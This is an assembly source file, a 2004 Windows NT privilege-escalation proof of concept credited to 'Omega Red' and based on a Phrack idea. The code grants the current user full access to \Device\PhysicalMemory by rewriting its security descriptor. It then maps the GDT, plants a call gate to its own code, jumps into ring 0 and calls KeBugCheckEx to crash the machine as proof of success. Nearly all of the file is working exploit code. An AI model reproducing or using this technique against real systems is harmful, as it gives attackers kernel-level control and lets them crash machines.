
; WinNT ring3->ring0 switcher using \Device\PhysicalMemory
; idea from Phrack zine
; if it shows a BSOD with [deadbeef/dead/beef/cafe/babe] then its working ;P
; unfortunately, we cannot call many kernel-mode NT APIs because needed ring0 "infrastructure" doesn't exist for our code

; 21-22.02.2004 :: Omega Red
; 11.03.2004 :: fixed callgate selector bug, VirtualLock
; 13.03.2004 :: finding ntoskrnl base & scanning its exports (thanks to comrade for better routine ;)

%include "omeg.inc"
%include "win32n.inc"

extern	GetSecurityInfo
extern	SetSecurityInfo
extern	GetSystemInfo
extern	wsprintfA
extern	MessageBoxA
extern	ExitProcess
extern	SetEntriesInAclA
extern	GetLastError
extern	LocalFree
extern	NtOpenSection
extern	NtMapViewOfSection
extern	NtUnmapViewOfSection
extern	NtClose
extern	VirtualLock
extern	VirtualUnlock
extern	PathFindFileNameA
extern	NtQuerySystemInformation	; for obtaining ntoskrnl base

; defines below from GREAT ntsys.h/ntdll.h from Sven B. Schreiber
SystemModuleInformation equ 11
MAXIMUM_FILENAME_LENGTH equ 256

struc SYSTEM_MODULE
  .dReserved01 resd 1
  .d04 resd 1
  .pAddress resd 1
  .dSize resd 1 ; bytes
  .dFlags resd 1
  .wId resw 1 ; zero based
  .wRank resw 1 ; 0 if not assigned
  .w18 resw 1
  .wNameOffset resw 1
  .abName resb MAXIMUM_FILENAME_LENGTH
endstruc

SYSTEM_MODULE_SIZE equ 284
MAX_MODULE_COUNT equ 1024

struc SYSTEM_MODULE_INFORMATION
  .dCount resd 1
  .m_tam resb SYSTEM_MODULE_SIZE*MAX_MODULE_COUNT ; arbitrary max count - not defined anywhere
endstruc

SYSTEM_MODULE_INFORMATION_SIZE equ 290820
;--------------------------------------------------------------------
section	.code	use32
start:
	mov		edi, modinfo
	mov		ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
	xor		eax, eax
	rep		stosd

; get allocation granularity (used in memory mapping)
	callf		GetSystemInfo, sys_info

	; find NtOsKrnl base
	call		GetNtoskrnl

	; open handle to the object
	callf		NtOpenSection, mem_section, WRITE_DAC|READ_CONTROL, obj_attr
	callf		NtErrorTest, e_opens1

	; get security descriptor
	callf		GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr
	callf		ErrorTestZ, e_getsec

	; modify access rights ;]
	mov		dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS
	mov		dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS
	mov		dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE
	mov		dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE
	mov		dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME
	mov		dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER
	mov		dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user

	; create new acl
	callf		SetEntriesInAclA, 1, access, [p_old_dacl], p_new_dacl
	callf		ErrorTestZ, e_setacl

	; update security descriptor with new acl
	callf		SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0
	callf		ErrorTestZ, e_setsec

	callf		LocalFree, p_sec_descr
	callf		NtClose, [mem_section]

	; ok.. now we have writable physical memory ;]
	; open it in r/w mode
	callf		NtOpenSection, mem_section, SECTION_MAP_READ|SECTION_MAP_WRITE, obj_attr
	callf		NtErrorTest, e_opens2

	; setup callgate (proc offset)
	mov		eax, ring0_proc
	mov		[callgate], ax
	shr		eax, 16
	mov		[callgate+6], ax

	; get gdt
	sgdt		[gdt]
	movzx		ebx, word [gdt_limit]
	mov		eax, [gdt_base]
	call		GetPhysicalAddress
	mov		[phys_address], eax
	callf		MapMemory, [gdt_base], ebx, PAGE_READWRITE

	; install callgate to our ring0 code in gdt - entry #100 (free)
	; this should *find* some empty descriptor, but i'm too lazy at the moment ;P
	mov		eax, [map_base]
	push		dword [callgate]
	pop		dword [eax+100*8]
	push		dword [callgate+4]
	pop		dword [eax+100*8+4]

	; ok.. almost there.. prepare far call
	mov		word [farcall+4], 100*8+3	; our callgate selector

	; lock the ring0 code to minimize chance that it will be paged out
	; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged...
	callf		VirtualLock, ring0_proc, ring0_end-ring0_proc

	; and.. jump!
	push		dword [ntoskrnl]
	call far [farcall]

	; cleanup
	callf		VirtualUnlock, ring0_proc, ring0_end-ring0_proc
	callf		NtUnmapViewOfSection, -1, [map_base]
	callf		NtErrorTest, e_unmaps
	callf		NtClose, [mem_section]
	ret
;--------------------------------------------------------------------
GetNtoskrnl:
	; enum modules
	callf		NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0
	callf		NtErrorTest, e_query
	mov		ebx, [modinfo]		; count
	mov		esi, modinfo+4		; 1st module

.1:									; loop
	mov		edi, esi
	add		edi, SYSTEM_MODULE.abName
	callf		PathFindFileNameA, edi
	or			dword [eax], 0x20202020	; convert to lowercase
	cmp		dword [eax], 'ntos'
	jne		.2
	or			dword [eax+4], 0x20202020
	cmp		dword [eax+4], 'krnl'
	jne		.2
	or			dword [eax+8], 0x20202020
	cmp		dword [eax+8], '.exe'
	jne		.2

	; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P)
	mov		eax, [esi+SYSTEM_MODULE.pAddress]	; base in memory
	mov		[ntoskrnl], eax
	ret

.2:
	add		esi, SYSTEM_MODULE_SIZE
	dec		ebx
	jns		.1

	; umm.. ntoskrnl not found - quite unlikely to happen ;]
	callf		MessageBoxA, 0, e_ntos, 0, 0
	callf		ExitProcess, 2
;--------------------------------------------------------------------
; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient
; input: linear address in eax
GetPhysicalAddress:
	cmp		eax, 0x80000000
	jae		.1
	cmp		eax, 0xA0000000
	jb			.1
	and		eax, 0x0FFFF000
	ret
.1:
	and		eax, 0x1FFFF000
	ret
;--------------------------------------------------------------------
; maps memory using \Device\PhysicalMemory
MapMemory:
sproc		base, size, access_mode
	mov		eax, base			; address
	xor		edx, edx
	push		eax
	div		dword [sys_info+SYSTEM_INFO.dwAllocationGranularity]	; edx = offset
	mov		edi, edx
	pop		eax
	mov		ebx, size			; size
	inc		ebx
	mov		esi, ebx				; mapped size
	add		esi, edi
	sub		eax, edi
	call		GetPhysicalAddress
	mov		[phys_address], eax
	mov		[mapped_size], esi
	mov		eax, [mem_section]
	callf		NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, access_mode
	add		[map_base], edi
	callf		NtErrorTest, e_maps
endsproc
;--------------------------------------------------------------------
NtErrorTest:
sproc	er_msg
	test		eax, eax
	jz			.ok
	callc		wsprintfA, txtbuf, f_err, er_msg, eax
	callf		MessageBoxA, 0, txtbuf, m_caption, MB_ICONWARNING
	callf		NtClose, [mem_section]
	callf		ExitProcess, 1
.ok:
endsproc
;--------------------------------------------------------------------
ErrorTest:
sproc	e_msg
	test		eax, eax
	jnz		.ok
	call		GetLastError
	callc		wsprintfA, txtbuf, f_err, e_msg, eax
	callf		MessageBoxA, 0, txtbuf, m_caption, MB_ICONWARNING
	callf		NtClose, [mem_section]
	callf		ExitProcess, 1
.ok:
endsproc
;--------------------------------------------------------------------
ErrorTestZ:
sproc	e1_msg
	test		eax, eax
	jz			.ok
	call		GetLastError
	callc		wsprintfA, txtbuf, f_err, e1_msg, eax
	callf		MessageBoxA, 0, txtbuf, m_caption, MB_ICONWARNING
	callf		NtClose, [mem_section]
	callf		ExitProcess, 1
.ok:
endsproc
;--------------------------------------------------------------------
; the real deal ;]
ring0_proc:
	cli
	mov		eax, [esp+8]			; param - ntoskrnl base

	push		ebx
	push		edx
	push		esi
	push		edi
; find KeBugCheckEx in exports
	mov		ebx, eax
	add		eax, [eax+0x3c]
	mov		edi, dword [eax+0x78]
	add		edi, ebx
	mov		esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
	add		esi, ebx

	xor		edx, edx
.name:
	mov		eax, [esi]
	add		eax, ebx
	; check function name
	cmp		dword [eax+00h], "KeBu"
	jne		.F
	cmp		dword [eax+04h], "gChe"
	jne		.F
	cmp		dword [eax+08h], "ckEx"
	jne		.F
	mov		eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals]
	add		eax, ebx
	movzx		esi, word [edx*2+eax]
	mov		eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
	add		eax, ebx
	mov		esi, [esi*4+eax]
	add		esi, ebx
	jmp		.fnd
.F:
	add		esi, 4
	inc		edx
	cmp		edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
	jne		.name
.fnd:
	mov		eax, esi

	pop		edi
	pop		esi
	pop		edx
	pop		ebx

;	int3
	callf		eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe
	retf 4

ring0_end:
;--------------------------------------------------------------------
section	.data
	m_caption		db		"NT ring0 by Omega Red",0
	f_err				db		"Error: %s, code: 0x%x",0
	e_opens1			db		"NtOpenSection for DACL access failed",0
	e_opens2			db		"NtOpenSection for r/w failed",0
	e_getsec			db		"GetSecurityInfo failed",0
	e_setacl			db		"SetEntriesInAclA failed",0
	e_setsec			db		"SetSecurityInfo failed",0
	e_maps			db		"NtMapViewOfSection failed",0
	e_unmaps			db		"NtUnmapViewOfSection failed",0
	e_query			db		"NtQuerySystemInformation failed",0
	e_ntos			db		"ntoskrnl.exe module not found in memory!",0
	s_cur_user		db		"CURRENT_USER",0

	align 4
	callgate			dw		0							; low part of address
						dw		8							; segment selector: #define KGDT_R0_CODE    8
						dw		1110110000000001b		; misc bits ;P (5 lowest = # of params)
						dw		0							; high part of address

	align 4
	s_mem_dev_uni	db		"\",0,"D",0,"e",0,"v",0,"i",0,"c",0,"e",0,"\",0,"P",0,"h",0,"y",0,"s",0
						db		"i",0,"c",0,"a",0,"l",0,"M",0,"e",0,"m",0,"o",0,"r",0,"y",0
	mem_dev_uni_len	equ	$-s_mem_dev_uni

	align 4
	mem_dev_name:		; unicode_string
					dw		mem_dev_uni_len
					dw		mem_dev_uni_len+2
					dd		s_mem_dev_uni

	phys_address	dd	0,0

	align 4
	obj_attr:	dd		OBJECT_ATTRIBUTES_SIZE
					dd		0
					dd		mem_dev_name
					dd		OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE
					dd		0
					dd		0

	access		times	EXPLICIT_ACCESS_SIZE	db	0
;--------------------------------------------------------------------
section	.bss
	gdt:
	gdt_limit		resw	1
	gdt_base			resd	1
	farcall:			resw	3
	txtbuf			resb	4096
	mem_section		resd	1
	mapped_size		resd	1
	map_base			resd	1
	p_old_dacl		resd	1
	p_new_dacl		resd	1
	p_sec_descr		resd	1
	sys_info			resb	SYSTEM_INFO_SIZE
	ntoskrnl			resd	1
	align 4
	modinfo			resb	SYSTEM_MODULE_INFORMATION_SIZE
